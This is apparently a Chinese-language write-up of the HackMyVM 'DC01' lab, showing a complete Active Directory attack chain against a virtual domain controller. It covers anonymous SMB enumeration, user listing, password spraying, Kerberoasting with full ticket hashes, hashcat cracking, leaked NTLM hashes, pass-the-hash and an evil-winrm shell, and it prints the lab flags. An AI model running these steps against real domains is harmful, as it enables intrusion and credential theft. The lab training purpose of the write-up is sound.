hackmyvm-dc01
hackmyvm-dc01
//探测主机
nmap -sP 192.168.5.0/24
//探测主机所有端口
nmap -sT -min-rate 10000 -p- 192.168.5.75
Starting Nmap 7.95 ( https://nmap.org ) at 2025-11-25 21:39 EST
Nmap scan report for 192.168.5.75 (192.168.5.75)
Host is up (0.0042s latency).
Not shown: 65517 filtered tcp ports (no-response)
PORT STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
5985/tcp open wsman
9389/tcp open adws
49664/tcp open unknown
49668/tcp open unknown
49671/tcp open unknown
49691/tcp open unknown
49754/tcp open unknown
MAC Address: 08:00:27:0B:87:1F (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
//版本探测及系统版本探测
nmap -sT -sV -O -p- 192.168.5.75
Nmap scan report for 192.168.5.75 (192.168.5.75)
Host is up (0.00081s latency).
Not shown: 65517 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-11-26 18:52:08Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: SOUPEDECODE.LOCAL0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: SOUPEDECODE.LOCAL0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
9389/tcp open mc-nmf .NET Message Framing
49664/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49671/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49691/tcp open msrpc Microsoft Windows RPC
49754/tcp open msrpc Microsoft Windows RPC
MAC Address: 08:00:27:0B:87:1F (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2022|11|2016 (97%)
OS CPE: cpe:/o:microsoft:windows_server_2022 cpe:/o:microsoft:windows_11 cpe:/o:microsoft:windows_server_2016
Aggressive OS guesses: Microsoft Windows Server 2022 (97%), Microsoft Windows 11 21H2 (91%), Microsoft Windows Server 2016 (91%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 172.05 seconds
发现有DNS,LDAP,SMB服务。先尝试SMB服务。
跑一下SMB服务匿名枚举。
smbmap -H 192.168.5.75 -u anonymous
________ ___ ___ _______ ___ ___ __ _______
/" )|" \ /" || _ "\ |" \ /" | /""\ | __ "\
(: \___/ \ \ // |(. |_) :) \ \ // | / \ (. |__) :)
\___ \ /\ \/. ||: \/ /\ \/. | /' /\ \ |: ____/
__/ \ |: \. |(| _ \ |: \. | // __' \ (| /
/" \ :) |. \ /: ||: |_) :)|. \ /: | / / \ \ /|__/ \
(_______/ |___|\__/|___|(_______/ |___|\__/|___|(___/ \___)(_______)
-----------------------------------------------------------------------------
SMBMap - Samba Share Enumerator v1.10.7 | Shawn Evans - ShawnDEvans@gmail.com
https://github.com/ShawnDEvans/smbmap
[*] Detected 1 hosts serving SMB
[*] Established 1 SMB connections(s) and 0 authenticated session(s)
[+] IP: 192.168.5.75:445 Name: 192.168.5.75 Status: Authenticated
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
backup NO ACCESS
C$ NO ACCESS Default share
IPC$ READ ONLY Remote IPC
NETLOGON NO ACCESS Logon server share
SYSVOL NO ACCESS Logon server share
Users NO ACCESS
发现只有IPC$可读。
smbclient //192.168.5.75/IPC$
Password for [WORKGROUP\kali]:
Try "help" to get a list of possible commands.
smb: \> ls
NT_STATUS_NO_SUCH_FILE listing \*
IPC$启用共享,可以通过impacket包中的lookupsid.py枚举用户
//用户名枚举,从nmap扫描结果可知,域是SOUPEDECODE.LOCAL0.
python3 /usr/share/doc/python3-impacket/examples/lookupsid.py SOUPEDECODE.LOCAL0./anonymous@192.168.5.75 > users.txt
//数据处理 仅提取用户名
cat users.txt | awk '{print substr($2, 13)}' > username.txt
尝试爆破
netexec smb 192.168.5.75 -u username.txt -p username.txt --continue-on-success --no-bruteforce | grep '+' | grep -v '(Guest)'
SMB 192.168.5.75 445 DC01 [+] SOUPEDECODE.LOCAL\ybob317:ybob317
获得一组凭据,smbclient连接
smbclient //192.168.5.75/Users -U ybob317%ybob317
smb: \ybob317\Desktop\> get user.txt
在桌面拿到userflag{6bab1f09a7403980bfeb4c2b412be47b}
开始尝试提权。
根据nmap扫描的结果可知靶机开启88端口,属于kerberos验证服务。
kerberoasting:只要用户提供的票据正确,服务就会返回自身hash加密的tgs票据,那么如果我们有一个域用户,就可以申请服务的tgs票据,本地爆破服务hash得到服务密码,这个过程叫做Kerberoasting。而在域中,服务通过spn来作为唯一标识。
本质上是去破解TGS票据,TGS票据是服务hash来加密的。
先获取用户SPN。
python3 /usr/share/doc/python3-impacket/examples/GetUserSPNs.py SOUPEDECODE.LOCAL/ybob317:ybob317 -dc-ip 192.168.5.75 -request
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
---------------------- -------------- -------- -------------------------- --------- ----------
FTP/FileServer file_svc 2024-06-17 13:32:23.726085 <never>
FW/ProxyServer firewall_svc 2024-06-17 13:28:32.710125 <never>
HTTP/BackupServer backup_svc 2024-06-17 13:28:49.476511 <never>
HTTP/WebServer web_svc 2024-06-17 13:29:04.569417 <never>
HTTPS/MonitoringServer monitoring_svc 2024-06-17 13:29:18.511871 <never>
[-] CCache file is not found. Skipping...
[-] Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)
kali机与靶机时区有问题,调整kali机时区。
需要先禁用本地的时间自动同步
sudo systemctl stop systemd-timesyncd
sudo systemctl disable systemd-timesyncd
调整时区
sudo rdate -n 192.168.5.75
sudo python3 get_dc_time.py -t smb -s 192.168.5.75
//两种方式,第二个B神的脚本,不加指定 跑出来的结果是错的
重新获取票据
python3 /usr/share/doc/python3-impacket/examples/GetUserSPNs.py SOUPEDECODE.LOCAL/ybob317:ybob317 -dc-ip 192.168.5.75 -request
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
---------------------- -------------- -------- -------------------------- --------- ----------
FTP/FileServer file_svc 2024-06-17 13:32:23.726085 <never>
FW/ProxyServer firewall_svc 2024-06-17 13:28:32.710125 <never>
HTTP/BackupServer backup_svc 2024-06-17 13:28:49.476511 <never>
HTTP/WebServer web_svc 2024-06-17 13:29:04.569417 <never>
HTTPS/MonitoringServer monitoring_svc 2024-06-17 13:29:18.511871 <never>
[-] CCache file is not found. Skipping...
$krb5tgs$23$*file_svc$SOUPEDECODE.LOCAL$SOUPEDECODE.LOCAL/file_svc*$6f8eb980735f10d7834775caf4186f43$ecf471562444d0d1e8639f9491a657af52e64ff71802967f0091e142de1084bd9dc8fda1fdb0f3fdfb3ae8676682ae566a229d7d458e1a1167bf43d1180214293e70d4da38dc6efffb1719f7a355ab1d087b753cb3407e39d4163ba650d57dfa28703490e78aae53d6d3dc236216452c74eaa02c6f895ef90b660628f19ece89ca305d71939f5000df16ddec768171873b654758da8391f5ad060d83bf85de2e9802d3b5b9b102ba07836d2fe8aedf3626d7b0c486a533fafba59d524c3072bf440ce9bc617543207f2b39b1f2147bc738f440db742a65e77d0ac309f0e3bd2363b6288f7638a55dfcf800dc725be7611a6859fd494156be654473a6d50dc7c7dbe8bf9e9fdb4d5c615bf60f3de39693084e2f0d509415e36afa5e0f772fccfb4e913281fd20d1356d3ee44e9c41f4fdb599573555ecfa67e87b96a890a21a37c6673dfe6b29dda240a060fcfc3b1301db8a4e373eeb495f04a6e382ad9702523239252fa040b84ef3ff4fa6441cbadf3dbf447b57ecc05cd3ab580006ff86b5d1912685d9a8237b4b000f26edb6bee2cb3975ea7ed5a5d9845a6560c293e70a0664d2d5968fe37aeeb2e64511592d638741e5628eabc60c4ed35bcba333e2c627737691c8a48ffa947a0f169d5bd9be2ee337b9839331f2ba84d727cef506db0e30abaed7d8b6b6012f534b27d506cfed4ff3fdf5bbd8199648b25725ed58161321970adfec0b93cb15fd0499ed1137dd926526a91288fd6bf59c5ccf0d7d335b0e5f8a2b7513e42b089c37434fc559a8ec74a4596d41b17f80579edfd6bbd65cd1fe972f84d83b074ba597d6281de4905969e72750d049834d9622b9fc25e87d13be56ba1907d6f999b5e8801910b1a447c89a3ba69d1c86f9f9025df8fb4ce38bc279006ddcba1a26cb53946be24ae6a4fb53ec0698e877ff33367fa0806dab733a19986c3487fbbf216195b0152a25535b9ba277dc63a229e9c482bc68e45a42dea0c2267495171d23499c5dd9b8560f2b8a99097316ff668529a8c8c5b192204b19df2b681087c990a93eae95178d277649f2ccfe3d2624341abb5a6b35a92adeef1068b87d585993943b3aaa49f9271b65f8a8131831fe8a1ff0d824a4190511b5ea3369fa0e32ad15d79b81dfc3117d7832d4c3558803f43e8c91911d5ee63b148479d06cf0297497ebc161d4aa2e9e290828b2628a9ef6b0620262a4143559075ab3968ec207db6b9c5a4023a34d7f8e7ce85c2cd05c3f72e23cfe6a8d67b8b149a1930de8318b9c39492b1fb2611e7552e1090948637d00e1ca381fe17ae60dd572714a01ff7321b55ea90c1b8f6b1ea5ee3802a4fa9e94d2a19bd711e4f273a19e685ae5510cceb9575721b4ba287267571c1d9b61144c3cb27c5aebf5826e267f939b0ebf0b43573180a183373e6a9a7cf4fad7f517ad106ced39aa682b51f45313d04d2d5661bde691e6e9ce31be1927715dade1c0566adcad5582
$krb5tgs$23$*firewall_svc$SOUPEDECODE.LOCAL$SOUPEDECODE.LOCAL/firewall_svc*$e4f799e522e89e531e70327a5a969ae9$ef030dbc4338b98a2a302c9bc28e60f7eccebf9a03893dbc27e64562110c671cd6cfc3f7fe453b22c95bf18611c00b1d933db9f95fe957ae47eedc719aa946feb428b82be057b0efa5ceb53c417808bec8da40fe2aa06cf88c8c608ef79927901ec3bfc4c553a22c6cbac6a03252f079f1d97e57b760aafcec1134bbe719430a31bc8be4b200297621ad92c14048d39a0647ea2d3e11eb15c044fa51f82a3a17a3c0e505639f8da8d7302e5681b7c815372a19adeaaaa34b5afa32f0266cea384a7ac99cb0fa5d8472ec66cebf2903d4a0c5e98eca2251c9bfc23da29cd039e0ce45a8c70dbcbbb3de5068a01cb97b2651ce0565df05451ff5494331b0dd630234453fd5992deb12bde26281be04d6e0d9c42cf04581bc6ef8df9093a526e1f983e11c553ff1cbc25ebff91bd81448f7852050cd12ac57ff50742578a556d8388fb688e0d130eddf3758f8559b06aee99ff7826f628c1bad097cec3cd99921c649e1bdfda88fbbe879bd8ad345b703de166fec4f2a34baff0e6b22f4b133d403d41234c527d314cdcea2bd72e58899c0116fe350e4c5de221349d52d9640053e68538a17c347a14f6517343a3fcb5fa754f9c477116a8165a8e379f1e7ce1c2db4ccedc8c244290b7473f5bd1d61e01c507e76c45f63dfe536fb4b8e8f5c9d131101612f133f2779951b014ed263fe3adc623bf5e3a988188485d852b41abd6b69f1ba598af58a1fbff261875274b7a92b25b5ebdc310d6aae45500d43c39a34d9410058d8fb842b617fbfce0b7536fe57a3cf3467a3d0f5403d638acf047ecb34574b8dbe66af91a40c12cdeb2d311987528296c4e3e0daf73a47573c98b74d96756ddc2d40ad4af859aa18872e0e6b11cb3970919f74171858a2e181661e9185b90765c966e05a3f5a1b9a5c852e0852b4d410e7279381f7d761598a7679743e64b32e551d6147a0b60e0e13fdb788a232b28e998345a0e10f89b50f85e7db447a5871fcdefd15ff6accd7a5d5bc7d3955ce7a7aa225db47143e58bc622092443aad7e530ebea378f3b23c56123352c22dda62c212099e171a59f6a14c2f6729d0c375a80b1a988c002496763d2e69ae04fc7bf393c6b07742cec78f4e305387a6346159e7a238c7ab79df6386652a84bc94f47a522de5e2b4cab1f9193c74ea08d92070d5ee957bb8a2159ba69d5a7d0245c8ece28bb109a10057cf0b1746a3afd71255cfbb34cd9ecf908ed247425cf301da023c0f67ed9f6c60c9db647618558aadffe1daf1a25005e97a70b8cd8d198d3fbbcb6721e72ae6182218f6ae291a6f8657dc029131b88000f546d9ebc193a998abd8758ea470a764d8d17376577414516ec7dee043a08545698df146792f28d8bbfb7c15f5924e585e96fd529e96cd990271d9c7c1bff5ed3fec233bd232560b681f36dea8b730aff1c16cdd2baf700cfe2dae74b7cf9137e5d5e3d74ad2f9467751491ead728adaa94d82ef7f
$krb5tgs$23$*backup_svc$SOUPEDECODE.LOCAL$SOUPEDECODE.LOCAL/backup_svc*$8c1f62a7415e35294d4aa5238340300f$a65af11caeb998e081a8d37c6a52c95457a722e68da4885b80d7236a4bc0b4ab3f016af6501c9886e93c8e9b0be1d740a1815cb67856f6eaedfcd2ba37de9593c5fc462e8ccb49673ab0ac40aaec16446fa6b145845b561baa453aedd6165e2ed3f15fb49a3bfd334a2cccf9e8c55617bb2546c6bb4cbc16edcb1659d5a6fe2969569ae9dc142968eba40b48d18ac46afe6cdc46178ce134d200e31e8c2069e9707909e35cd3f92ff86a246237eff539223f987f0a50099a185b2a82a95f42617c467685090135dfdd93210eb6a2109db5c5c273c52422f9b6744dd40b4856ebc6dbfccdb11a0da93e1b0bd23391d9dfba2ce12720ac4233efcd4f814dc36075919fee2c205bb9c6eab1ec9ab001d3f207ecb9562482a0f14beebbd8ceae56648e30e8104efe6d68c3f3701f8c9ddb483d0a87c3691bfe50476ad1c17e2a065482a8e51ee8411123c5b52599a23b9955559abb8c5a30b7dabefd27d505cec9e75672bb5f27173af37a9a6a701acc1072ef4d3bb17b3e406a4a7f11b3f185d860c9d56acad2e478b585a9916f8fe7c83cd46e4b484c241b730e08880248e0ad9f765ad8818b85f446bd67dfd76be893e4554dfb090a6a5d0afc6aecb9994dd0076148b05d165094d6dbcc0a2755117543a9e6291a148ed84249bfa1e68466800c9381ea2112ec7eeb79fa45c3c4fcae2bcb74a90cca713865338b33f478045cb7f10805edcb1f23ebae05e59e6ba623b83aedd860cf3589b387c7e6221746df5faa63a8785840c73d5d128356c9ad1223ca6d41050aba57ad3598791466dbb260b4bd5c75fc1254d758bba1d8c9bdc0da5292cf2789cce9adffcc69a2779c198865faa348d11e1b8c02d6d43c589d5b47f15689614679f8f8c538dfb6d1378f36e1eb30e98b53c0a4e6936afdb1cb826cc7ee2d4c1209401559eef50b90f97429dd569b26dfc700ea2b438d8a97aeb9eeec8727bdc8b9da9f7295823007778e08661290582683f24fb4bd174f13510d362b46676599fbb329c21f31772ee790a99a69675bbeb15bd595b9539ec454fc4be40690d35f27eef04747eb18b9dbb260378db6342cadadbc9857a55178b7ae778f9ab04d736ac5750c6999aa5510f9aef3e9ab96c2259ec63f0d793c18fe6ba7c16c7acf8865d28d8f8292006630ebcddd8e1445a45dd0051c0d33f883636d9559f4bdf4fffa7530f09cc48fbedb1f25ea43dec9802068d4a278c3f0f3cada2dbe7446d40dc4e9d356dbd790af0bf8c79c7a9887af214414f0f087ea472628847aaf6f26fdf1a9444fa06b0e2804b1321abcaa8809a5cfed9f0f00b549826e6ee78bd6bbc6e191aa6dd17285abf9f8e8b8256a0701c7c0580e41aed16bfb4c61b09b3a54a81488652b6ab63ea3fb07b6c4ef958d7b0ab2b78871e35a089bbc946eff25018c847b5d21e35eae1b10376a188926942836a6649f59bdaa4bf788c88c25b278a8f7df3b432904ab4eba12f760
$krb5tgs$23$*web_svc$SOUPEDECODE.LOCAL$SOUPEDECODE.LOCAL/web_svc*$5ae6a77d2e88b507103ec04c27016c3c$bb7ba13646d46f8c3c3c90afe4661bd4f5b3b8a17f7f7e4a330863ce7ca820dd3670e4c6ae456757ed263674377637bde7870b440fc556fd80b558488c2047ecb348c26070973b308ab0aea2d24a5fd647846b3ceaf3668b86cab44dbfe194ef2fb32857cf30267c4ccd3f60e14b201b76bd6655fde19b870d7c1c405a16d47ccd3a5daf570af69335035c8f216172a0ec7b597c45b795a7e03e0a124286d81641a831282a2c364b2adb04a64f51d07e97048e99e98b3d5c115dd0dff4e460372dcd33750d984342b57fed1811fa41618051e1232a89d354f0999768df34ba39c4293469d185c23564fe17dfa4cb463290cbc3d822c55d57f7280b313c6df90fdc0ae45ea9bf55bd0a9e0c859d6518398e5d39e39b724471a42796cfc60c8a8ba5dda38d111c0682c5ec49da0a2b6c43cd04cff73c7ad2793aa67a4aac17438484b25fc5499ba358fc9cd9318b899a823eab488e368c5e90d9e62c01ade2d532648013b25ee794e48ea3d70d6b593b77527dcc2f5e90873abd7b60a1d900e5a6388afdde12c78cea786e8300c4ee7be7640cda8adadfb63bbcc064f6f11590c75b01244994ff8385a23e1c812d69ab3164e3f9f47e3923414cf1a100c536a0080adf7a3360974bf10e23ceb69044901a3ccd25acb451c77feb1b791ab3b179dd6389d7724e3875238b2602f86444d2722169bf76dc6b25047b14b0e64d081b242a857c142f3254a43bc0cafc56041c06b4248a4f9840c85a31ea810a33bf83513c0f7e9e1ea65e048fb2a47427052560935d3cba6145b9c8dffc33d8f41fdda9906ccc7af677f880f342332482947646c49cf31ba38a9b54048fde8ca2abfb0480a62223f7c97f0e267dca90388576eef12f7ff4e0ea6040ae0f5a5dc4e585406df26cc5d97ae4611de3c2d73f07b2b69748943ce7560d0a32d34ba56e2a237b071d31b8946bdd259b5d938d3a94aae34ab8cade9ac5542b0f328945204ca08f6e7da6fb1549bc69d0e137a5e325395741fbc5465ed8cda0fa15ebda55432efe1034a39f0bc54946c443c1388a7f8cbd8164fd10c5889d735fcdaa281f0160fba72c28f077e801e7adea859f6cd4a61dd474157c863fef6fa8a6924b955855a68e69ce67a52441ccfe2f937e6246d7cd0888b359ce7e511837691fe3652bb37da4171b4eb6fbeb7aae33e4e92e95e0820c5e8ab8f136d265e69ab3018646ab26b577da04b45e950524eba84dbdb47db89a8f2cacce69992c2172103f26e940499583b077c69a4bdd447e69f68f48e0b36624ef9d3c980a428b68c62eb05772ec05ac29e9a717b9c77e43b51d13393a3076f6f82f6ed7875f80b36440d522ad73013d065cf00b69e2250628e037cafae336bc685b58d4281f3276a18001090c03017376987537a389b01fa402093a18353d1214f849e7567ac8cf441c147dcad416e4d7d59a7cfc4efa9aa9b189bf28a852f8bbac186052220c7b1b32c652af1b11
$krb5tgs$23$*monitoring_svc$SOUPEDECODE.LOCAL$SOUPEDECODE.LOCAL/monitoring_svc*$94c22ad5544902e614a571e19a5ec727$5c28f1dc1f8e15d14ec7b400f636fdf29488fdb20b3b4ee80e5654033be89ed7f2ece7d964c15e6e867c5494d6e30bb5a3405fbb6e532292391b4b943930f3b4fd58e86253b2dd83dbd554fbb6c8f52dd8182859def1d389e06fe22229ee036b0435fd301bb7c8a47e7fb7276933584de310c87402e1a2e34ac361c2b804855a3cabb19e14e5ea9daf14f9d1e7c52f733ddc5c6d347e562abda7cacc8257f4770b1727e36d02504005b4ba96a609ae1c8de13098ae613f8f9f8f73e53e5096888af70d0181e966a8ec4c93bdd00ba68b00541cb29c2299556260e0e6c1858808e0f0b346c78381485da91f883cbfb24508fc6e7a58716ba729101270179cf3029f7755cda384677b625d51639a633c114026107f074d11acd543f831a507875289599890a1e3acf1a2e6ff4404f4006f907b3dc5d2810f2a8e64e59c8dbb87e4e07086f6ae62b22967e0af07a5fa19c35dcfeec858260c6bf15293a5d39991fdb819197baa694e808ff6a043da06af991723c00b5ae8b121ace8f017f792ed0a74e25623eeb6d111beb61b7164b6a71db4f0236f9b07afb757f8556489f65cfbb8ed7ecb6a6c11814a9b9c3d9dc053b116a62a8341306bf1242c6379cae186d8b57b53ef1d7fbaf72d5bb9c437b3cfb94674c9c4ed471ae297fbc4d0234e4c1c8cc6312aab57fde147c4c2c0d8a80af21b443f1a3eb437899d024ce411a9f9299fad70196d45a77ceaeef730b9bfc011f232ea8e9bd4e78d0e091e2cae4f38cde06ed6e86a0601d3494cc5416b0bf6fdef73d12612cd646491a399b2575596948401aabbf8693282b7bd2cb139cb11adb6f7d1f4c36b66e0e67f5529849c128f007f99c6e6c587275bde7ba2e09f96d747cfbce5e1fef6ff7e85d229b17ceee079bdd7d1002eead453e0aac0dd030d956fc11866165c4a176cbafc02532d83bce9851e6fd0b6492ec16758f8d671534b69536331f789d61ae4c3b953db0e524f8ad2e74645dfc7d321cc8b4419e960b6c3713be11526341ca7628c57250c7008e44b34c2c397c3e0cf140abdf7952a1cf2241c2111ae4d1c71cb41f80f22438dd8d7d65aa2dcf921470e70cbc798d2c06205351cdd201b8f75bd2ec17a1c1dfa968018218ed5b7fcd5604cae98b923c3d0ed2d31110c55cc5ee9ab9cd2a6ceb807840ca308b0f11551dfc1b04513c7eec9cd7bd8c3c2129a56726563e61df920783cc475e4c529598abe15c352c036eb195a00bd5fc15561df8e3b91d08a32261e19438cc76ed031af646bc9b6519b810fd880c6e0fbacb6e08216d1ba0a7d03abd770de0be43fff570eee304e29b384454f85b30b4003738c26bc2a1d5375c50ef5006905f6773cd8070e959f0be16731bbe95a8b435afcdc0a939ace9abfb377dbed155894d58b384723d5ff7ccba2202785a6cc574a23e50611cbe23d18e304a4c824de38af0c493ef544ef6ceef3e5f3273754ab8bc97161cd8d02c45c5ff3
hashcat爆破
hashcat.exe -m 13100 1.txt dic.txt
拿到一个file_svc的密码Password123!!
进行密码喷洒,看密码属于哪个用户。
netexec smb 192.168.5.75 -u username.txt -p 'Password123!!' --continue-on-success --no-bruteforce | grep '+' | grep -v '(Guest)'
SMB 192.168.5.75 445 DC01 [+] SOUPEDECODE.LOCAL\file_svc:Password123!!
发现应该是只有用户file_svc。
smbmap -H 192.168.5.75 -u file_svc -p 'Password123!!' -d SOUPEDECODE.LOCAL
________ ___ ___ _______ ___ ___ __ _______
/" )|" \ /" || _ "\ |" \ /" | /""\ | __ "\
(: \___/ \ \ // |(. |_) :) \ \ // | / \ (. |__) :)
\___ \ /\ \/. ||: \/ /\ \/. | /' /\ \ |: ____/
__/ \ |: \. |(| _ \ |: \. | // __' \ (| /
/" \ :) |. \ /: ||: |_) :)|. \ /: | / / \ \ /|__/ \
(_______/ |___|\__/|___|(_______/ |___|\__/|___|(___/ \___)(_______)
-----------------------------------------------------------------------------
SMBMap - Samba Share Enumerator v1.10.7 | Shawn Evans - ShawnDEvans@gmail.com
https://github.com/ShawnDEvans/smbmap
[*] Detected 1 hosts serving SMB
[*] Established 1 SMB connections(s) and 1 authenticated session(s)
[+] IP: 192.168.5.75:445 Name: 192.168.5.75 Status: Authenticated
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
backup READ ONLY
C$ NO ACCESS Default share
IPC$ READ ONLY Remote IPC
NETLOGON READ ONLY Logon server share
SYSVOL READ ONLY Logon server share
Users NO ACCESS
[*] Closed 1 connections
去看backup文件夹。
mbclient //192.168.5.75/backup -U SOUPEDECODE.LOCAL/file_svc%'Password123!!'
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Mon Jun 17 13:41:17 2024
.. DR 0 Mon Jun 17 13:44:56 2024
backup_extract.txt A 892 Mon Jun 17 04:41:05 2024
12942591 blocks of size 4096. 10919470 blocks available
发现一些服务的hash
cat backup_extract.txt
WebServer$:2119:aad3b435b51404eeaad3b435b51404ee:c47b45f5d4df5a494bd19f13e14f7902:::
DatabaseServer$:2120:aad3b435b51404eeaad3b435b51404ee:406b424c7b483a42458bf6f545c936f7:::
CitrixServer$:2122:aad3b435b51404eeaad3b435b51404ee:48fc7eca9af236d7849273990f6c5117:::
FileServer$:2065:aad3b435b51404eeaad3b435b51404ee:e41da7e79a4c76dbd9cf79d1cb325559:::
MailServer$:2124:aad3b435b51404eeaad3b435b51404ee:46a4655f18def136b3bfab7b0b4e70e3:::
BackupServer$:2125:aad3b435b51404eeaad3b435b51404ee:46a4655f18def136b3bfab7b0b4e70e3:::
ApplicationServer$:2126:aad3b435b51404eeaad3b435b51404ee:8cd90ac6cba6dde9d8038b068c17e9f5:::
PrintServer$:2127:aad3b435b51404eeaad3b435b51404ee:b8a38c432ac59ed00b2a373f4f050d28:::
ProxyServer$:2128:aad3b435b51404eeaad3b435b51404ee:4e3f0bb3e5b6e3e662611b1a87988881:::
MonitoringServer$:2129:aad3b435b51404eeaad3b435b51404ee:48fc7eca9af236d7849273990f6c5117:::
尝试PTH攻击
netexec smb 192.168.5.75 -u usernames.txt -H ntlm.txt | grep '+'
SMB 192.168.5.75 445 DC01 [+] SOUPEDECODE.LOCAL\FileServer$:e41da7e79a4c76dbd9cf79d1cb325559 (Pwn3d!)
使用evil-winrm获得shell
evil-winrm -i 192.168.5.75 -u 'FileServer$' -H 'e41da7e79a4c76dbd9cf79d1cb325559'
*Evil-WinRM* PS C:\Users\administrator\Desktop> type root.txt
a9564ebc3289b7a14551baf8ad5ec60a
艰难困苦,玉汝于成
浙公网安备 33010602011771号